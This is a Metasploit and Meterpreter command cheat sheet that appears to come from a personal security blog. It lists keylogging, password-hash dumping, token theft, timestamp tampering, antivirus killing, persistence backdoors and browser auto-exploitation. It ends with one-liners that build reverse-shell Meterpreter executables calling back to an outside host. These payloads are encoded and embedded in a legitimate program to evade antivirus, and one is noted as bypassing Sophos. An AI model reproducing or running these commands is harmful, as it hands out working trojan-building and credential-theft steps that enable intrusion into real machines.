Metasploit Notes

[Fi8sVrs]

Meterpreter

Process:

getuid                          hows user id
getpid                          shows meterpreter process id
ps                              ists running processes
migrate [ps]                    migrates to given process (one that wont end/crash)

KeyLog: Ensure you are monitoring the correct session (Explorer.exe/WinLogin.exe)

idletime                        shows how long machine has been idle for
keyscan_start                   starts the key logger
keyscan_dump                    outputs captured data
keyscan_stop                    stops the keylogger

Channels: This allows you to do more than one thing at a time in meterpreter

execute -f cmd.exe -c           opens a new cmd.exe and creates a new channel for it
channel -l                      lists the open channels
read [channel]                  outputs data from channel
interact [channel]              allows you to jump into the channel
write [channel]                 sends data to the channel
close [channel]                 kills the channel

Session: Session0 is the local desktop. Session1+ are rdp sessions.

enumdesktops                    shows currently open desktops such as winlogin etc
getdesktop                      shows current desktop session meterpreter is in
setdesktop                      changes to an already open desktop session
uictl disable keyboard          disables the keyboard of the desktop session

FileEdit: Ability to edit files atributes such as MACE

timestomp file.txt -c "30/12/1980 12:12:34"     changes file stamp of file
timestomp file.txt -f sourcefile.txt            copys timestamp from sourcefile.txt
use priv                        to load the priv extras
hashdump                        to dump the SAM file 

Tokens: Incognito allows token stealing and other token functions

use incognito                   loads the incognito into meterpreter
list_tokens -u                  shows stealable tokens
impersonate_token               allows a token to be stolen
steal_token [psid]              allows ability to steal token of a process
rev2self                        reverts to origional token
run post/windows/gather/cachedump       gets cached domain hashes

need to wget http://lab.mediaservice.net/code/cachedump.rb to framework3/modules/post/windows/gather

Sniffer: Allows promiscuos mode to be enabled

use sniffer                     loads the sniffer functions
sniffer_interfaces              list interface 1,2,3,4,5,6,etc
sniffer_start [n]               starts the sniffer for the interface
sniffer_stats [n]               lists packets, time, etc..
sniffer_dump [n] file.pcap      dumps the capture locally
sniffer_stop                    you guessed it 

Meterpreter Scripts: These scripts perform various functions on the victim

run checkvm                     checks if the target is a vm
run credscollect                dumps hashes and tokens to screen
run enum_firefox                dumps temp internet files from firefox – cookies, passwords, etc 
run get_application_list        shows installed applications
run killav                      trys to stop all known AV progs
run get_local_subnets           enumerates local subnet info
run metsvc                      creates a backdoor
run persistence                 survices a reboot (without admin or system)
run schedulme -e file.exe -m 30 you‘ll need to man load the meterpreter.exe payload
run kitrap0d                    allows priv escalation using CVE-2010-0232

web browser exploit

use auxilary/server/browser_autopwn
set LHOST [local_ip]
set SRVPORT 80
set URIPATH /
run
#now get the client to connect to you (use ettercap dns)

inbuilt sqlite db

db_driver sqlite3      starts the db using sqlite (file based)
db_connect job       creates a new db called job and connects to it
db_hosts                shows hosts
db_services           shows visible services
db_nmap -sS [target_ip]     performs nmap against target and stores in db
dn_import_nmap_xml        allows inport
db_autopwn -p -e -r -t         autoown from db vulns

Meterpreter Payload Backdoor

./msfpayload windows/meterpreter/reverse_tcp LHOST=phillipshome.getmyip.com LPORT=4444 X > clear.exe
./msfpayload windows/meterpreter/reverse_tcp LHOST=phillipshome.getmyip.com LPORT=4444 R | ./msfencode -e x86/shikata_ga_nai -c 5 -t exe -o encoded.exe
sets the payload as meterpreter and then encodes it 5 times to bypass AV
./msfpayload windows/meterpreter/reverse_tcp LHOST=phillipshome.getmyip.com LPORT=4444 R | ./msfencode -t exe -x /mnt/hgfs/tools/exploits/spider.exe -k -o /share/spider.exe -e x86/shikata_ga_nai -c 5
#this fucker bypasses sophos  
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=4444 E

One Liners

# One liner meterpreter reverse_tcp
/pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=`ifconfig  | grep ‘inet addr:’| grep -v ’127.0.0.1? | cut -d: -f2 | awk ‘{ print $1}’` LPORT=4444 X > /root/clear.exe
# One liner shikata encoded meterpreter reverse_tcp
/pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=`ifconfig  | grep ‘inet addr:’| grep -v ’127.0.0.1? | cut -d: -f2 | awk ‘{ print $1}’` LPORT=4444 R | /pentest/exploits/framework3/msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /root/encoded.exe

# One liner encoded and hidden in windows exe meterpreter reverse_tcp
/pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=`ifconfig  | grep ‘inet addr:’| grep -v ’127.0.0.1? | cut -d: -f2 | awk ‘{ print $1}’` LPORT=4444 R |/pentest/exploits/framework3/msfencode -t exe -x /mnt/hgfs/tools/exploits/spider.exe -k -o /root/spider.exe -e x86/shikata_ga_nai -c 5

Metasploit Notes | phillips321.co.uk